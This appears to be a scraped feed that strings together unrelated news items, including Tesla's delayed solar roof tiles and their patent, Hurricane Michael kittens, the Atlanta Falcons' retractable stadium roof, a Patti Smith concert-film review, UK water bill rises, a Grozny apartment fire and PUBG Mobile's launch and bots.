In November 2016, Tesla CEO Elon Musk gathered a collection of investors, fans, and journalists at the Universal Studios backlot in Los Angeles, California, and revealed his vision of a “solar roof”—that is, tiles with solar cells integrated into them so that they look just like regular roofing tiles, except they produce power.
At the time, SolarCity and Tesla officials said that solar roof installation would begin in summer 2017. Initially, Tesla employees were the only customers, until Tesla reportedly started installing solar roofs for reservation holders in January. Eventually, that seemed to stall, too. Reports indicated that, as of May 31, only 12 solar roof systems had been installed, all in Northern California. In an August shareholder call, Musk said that solar roof installations were finally ramping up, with “several hundred” solar roofs being installed. The company later contacted Ars to clarify that this number included homes that were scheduled for installation, not homes that were actively having a solar roof installed.
Tesla has said that it’s taking time to verify the safety of these solar roofs to make sure they’ll work for decades rather than a dozen years. In the company’s Q2 shareholder letter, Tesla wrote, “We are steadily ramping Solar Roof production in Buffalo and are also continuing to iterate on the product design and production process, learning from our early factory production and field installations. We have deployed Solar Roof on additional homes in Q2 and are gaining valuable feedback from each new installation.” The letter added that Tesla plans to ramp up more toward the end of 2018, so if you’re on the reservation list, you might get lucky soon.

While reporting on Hurricane Michael’s destruction from Panama City, Florida Thursday morning, ABC News’ Rob Marciano showed off four kittens that were rescued from the storm.
He said he spoke to a family who rode out the storm, who found the kittens when their roof collapsed, and the baby felines “fell out of the ceiling and into the kitchen.”See the rest of the story at Business Insider

The production problems Tesla has faced with its Model 3 have been well documented. Now, sources say the company is facing similar issues with its solar roof tile initiative. According to Reuters, former and current employees have revealed that assembly line problems, plus CEO Elon Musk’s exacting aesthetic demands, has delayed production, causing tension with partner Panasonic, and rattling officials that are keen to see a return on significant state investment.
The “Solar Roof,” produced at Tesla’s factory in Buffalo, New York, is designed to look like and function as a regular roof while also generating energy. According to sources, technical challenges have delayed production, as has Musk’s design plans. Speaking to Reuters, one source said that “Aesthetic look is the key point that Elon is not always satisfied with. That’s the big issue.”
Neither Tesla nor Reuters‘ sources have revealed current production figures for the roof tiles, but the delays are such that Panasonic — which the initiative depends on for solar components — has been forced to find other buyers for the parts it had built to sell to Tesla. According to a former Panasonic employee, the company has been shipping “large volumes” of its photovoltaic cells as samples to other prospective buyers, due to low demand from Tesla. Panasonic declined to comment on the issue, stating only that it “believes Tesla will use Panasonic cells when it mass-markets the Solar roof.”
It’s not clear when that will actually happen. In an investor call last week, Musk said that “hundreds” of homes already had solar roofs, but the company later clarified to Reuters that Musk’s estimate included systems that had been partly installed or scheduled for installation. According to state records, there are just 12 Tesla roof systems in operation in California.
Tesla received massive state support for the project, including $ 350 million to build the factor, $ 275 million for equipment and $ 125 million for additional costs. In return, the company is require to employ 1,460 people in Buffalo and spend $ 5 billion in the state over a decade. Some lawmakers are concerned that the delays jeopardize Tesla’s ability to hold up its end of the deal, however Tesla would face penalties of $ 41.2 million a year if that were to happen. In a statement, Tesla said its facility now employs 600 people, and is “on track to meet all of its commitments.”

There’s a new candidate for the title of the most most technologically advanced stadium in the NFL, as the Atlanta Falcons unveiled a stunning new retractable roof which can open fully in just over eight minutes.
The Falcons’ Mercedes-Benz stadium now joins the likes of the Dallas Cowboys’ AT&T Stadium, with its basketball court-sized high definition video display, as being one of the most futuristic (not to mention expensive) stadiums in the US.

The time the roof took to fully retract beat even the expectations of its architects, who had estimated that it would take closer to 12 minutes to open. The roof closes even faster, at just over seven minutes.
The stadium was formally opened last August after the completion of the $ 1.1billion project, though unforeseen problems with the construction of the retractable roof meant that its formal ‘opening’ was delayed until recently. It was certainly worth the wait.
“It’s great to have it finished,’ said Mike Egan, a senior vice president of the Falcons.
“It was never a question of the roof being broken or unsafe. It was literally just a question of needing to get the balance (of the roof) right so the propulsion system would achieve its desired life.
“It took as long as it did because this is a busy building and we had to work around events,” Egan continued. ‘It’s a relief, but we really never had any doubt we would get to this point. It’s more just a feeling of exhilaration to see it working the way it is supposed to.‘
Around 60,000 fans are expected to attend a public ceremony to officially mark the construction of the retractable roof on Sunday.

Tesla’s solar roof tiles are revolutionary because they look like regular shingles. They cut out the need for unsightly solar panels while delivering about 98 percent of the efficiency of normal solar panels, which is quite the feat. Now, thanks to Electrek‘s discovery of Tesla’s patent application for these tiles, we have a better idea of how they work.
As you can imagine, the technology is incredibly complicated. Basically, the solar cells are under a special louvered glass. The way this glass reflects light makes the tiles look like normal shingles from the street level. However, the glass is transparent from an overhead view. which allows the solar cells to do their job. “The louvers are designed to provide viewing obstruction to the photovoltaic cells . . . when viewed from a side angle but to minimally impede solar energy passed to the photovoltaic cells.”
The application contains these images which demonstrates how these solar tiles work.

The application also elaborates on how the solar roof tiles can have different colors when viewed from certain angles. “The plurality of louvers may have a design color that causes the solar panel to have the appearance of the design color when viewed from a side angle, thereby obscuring the solar panel from view,” the patent application says. “Further, with this construct, the solar panel may have the design color when viewed from the side angle and a differing color when viewed from the other side angle.”

]]>The film, directed by Steven Sebring (who also helmed the 2008 documentary Patti Smith: Dream of Life) finds the band performing the album in sequence, complete with a side-change announcement by Ms. Smith (“Now you have to turn the record, place it on the turntable… bring the arm gently toward the vinyl to the groove… and play side B!”). There are the briefest of off-stage cinematic interludes between songs, and some stage patter between others (“There’s a part in this song for you to sing it.” “WE LOVE YOU!” “Well if you love me, you’ll fuckin’ sing it!”).

But the main focus is the show – sometimes a concert, sometimes a poetry reading, sometimes a revival meeting, sometimes an exorcism. She’s no longer the iconoclastic punk she was when Horses hit record stores; she’s aged, and she’s calmed. But she’s not calm. The intensity that has characterized her work hasn’t gone anywhere.
And thus the songs still pulse with the energy of their origination; these do not sound like “oldies,” though they are older now than rock itself was when they were released. Over the course of the 77-minute film, Smith and the band perform the whole record, from “Gloria” to “Elegie,” the latter including the names of more recently departed (including Mapplethorpe, Lou Reed, the Ramones, Joe Strummer, Kurt Cobain, and Amy Winhouse) chanted like incantations. As an encore, they perform an electrifying cover of “My Generation” (with special guest Flea) – with Smith putting a new spin on the whole “before I grow old” business.
Throughout the film, Sebring’s camera nicely captures not only the driving momentum of the show, but the flourishes of Smith’s shamanistic stage style: the way she stomps her feet, the way she moves her hands, the wicked way she delivers the final “but not mine” at the end of “Gloria.” Sebring plucks out some interesting visuals, but he mostly (and wisely) focuses on the best landscape a filmmaker could ask for: Patti’s face, summoning up all the raw emotion and lived history of these songs, up to her final instructions to her audience: “Be strong! Be ugly! Be free!”

After the screening, Tribeca viewers got a treat: a six-song live set from Smith and the band. So we heard “Horses” itself live, plus some of the faves from other albums – “Dancing Barefoot,” “Pissin’ in a River,” that kinda thing. They performed a cover of Buffalo Springfield’s “For What It’s Worth,” preceded by her passionate endorsement of the Florida teens: “These are the times that try men’s souls, and every single fucking day what they do in Washington tries our souls. But parallel to that, we have five students who magnified millions. The Parkland Five and millions of young people are the hope of this fucking planet! We have to be with them, pray with them, march with them, their cause is ours, their cause is our future!”
And then Bruce Springsteen came out – after all, it was a Monday night, his Broadway show was dark, might as well – to sing “Because the Night” as a duet, and an entire theater lost their minds. And then Michael Stipe came out, just to sing along with the chorus of “People Have the Power,” and dance a bit. And then we were all launched back into the universe, as if we could live the rest of our night like this, aware that musical legends could just magically appear out of the ether. God bless this film festival, folks.

The average water bill will shoot up to £405 for households in the UK.
The extra cash will go towards fixing leaking pipes across the country to prevent water losses and flooding.
However, it is likely many Britons won’t be happy with spending more on the service which helps them keep themselves and their homes clean.
Water UK revealed the money will go to £44 billion investment to prevent 370 million litres a day leaking from pipes by 2020.
It also will aim to prevent 5,000 homes from being flooded with water from the sewer.
Consumer Council for Water (CCWater) told The Mirror: “Most water companies are reducing their charges before inflation is added to bills which has softened the blow, but this will still be an unwelcome increase for millions of customers that are facing other rising costs.”
According to CCWater more than three million households already find their bills unaffordable.
“”Even though the cost of water and sewerage is much less than other services, it all adds up, which is why water companies are doing everything they can to keep bills as low as possible while keeping up huge levels of investment,” Water UK chief executive Michael Roberts told the paper.
Martin Lewis revealed that you can help reduce the cost your bill by asking for free stuff from your provider.
He said: “If you’re on a water meter or not, you can get freebies from your water company that’ll help use less water and can slash water and energy bills by hundreds of pounds.
“For example with Thames Water, United Utilities and Yorkshire Water you can get a free £20ish shower head (which helps reduce water usage, but keeps the same pressure) and free £7ish tap aerators (to regulate the flow of water from your tap).
“While with South West Water and Affinity Water you can get free £2 Save-A-Flush bags.”
Restricting how much water you use ca help to shrink your bills.
The Eden Project recommends turning off the tap while you brush your teeth, being quick in the shower and always filling up the washing machine and dishwasher.
A water butt or rainwater tank collects water that runs off roofs.
They can collect up to 2300 litres of water per year, which you can use to water pipes instead of the hose pipe.
A water metre shows you how much water you are using in real time.
This could encourage you to keep an eye on your consumption, as you see the cost increase during the month.
A major fire has consumed the roof and upper floors of a multi-storey block of flats in the city of Grozny. More than 200 people have been evacuated, as firefighters work on extinguishing the flames.

It has been revealed that PUBG mobile downloads on Android and iOS are pretty high right now.
Having launched to a larger audience on March 19, the game appears to be topping a lot of charts.
It’s being reported that PUBG Mobile has reached the no.1 spot in over 100 countries, just days after releasing worldwide.
Fans are already comparing it to its big rival Fortnite, which has been doing a good job smashing the charts too.
However, while PUBG Mobile is currently doing better than Fortnite in several regions, there’s good reason for that.
PUBG on iOS and Android is available now and only requires players to download the rather large app.
The big difference here is that Fortnite on Mobile is only available on iOS, and even then it is invite-only.
That means that when Fortnite launches fully on both platforms, PUBG will be in for a fight.
There is some good news for fans of the portable PlayerUnknown’s Battlegrounds though.
This week has seen reports of the game using bots, something that has left some fans uneasy.
Players have been reporting a lot more chicken dinners on mobile than they have seen on PC and Xbox One.
It appears that when a player first starts their campaign, his first PUBG games are filled with bots.
Only when someone reaches level 10 do they start to see a majority of human players.
But there’s some good news to all this, namely that the bots don’t look to be there just to plump up the numbers.
It appears they’re being used to ease players into the game, without being brutalised too much by those top players.
After a certain point, players are reporting bots being eased out, meaning that fears of a AI-filled future can be put to rest.
PUBG Mobile is available in the UK from the Google Play Store, while its App Store description says the game “perfectly recreates” the PC version.
This means PUBG Mobile has voice chat for squad communication, plus extra mobile optimisations like aim assist and auto-pick up items.
But there is one area where PUBG Mobile has a big advantage over Fortnite Mobile, and that’s in the game’s required specs.
Fortnite Mobile can run on a number of different iOS devices, but its minimum iPhone requirement is the iPhone 6S.
PUBG Mobile, meanwhile, can run on an iPhone 5S – a model two years older than the 6S.
While PUBG Mobile can run on the iPhone 5S, it is recommended that players use the iPhone 6.
Which, still, is a model a year older than what is needed to run Fortnite Mobile.
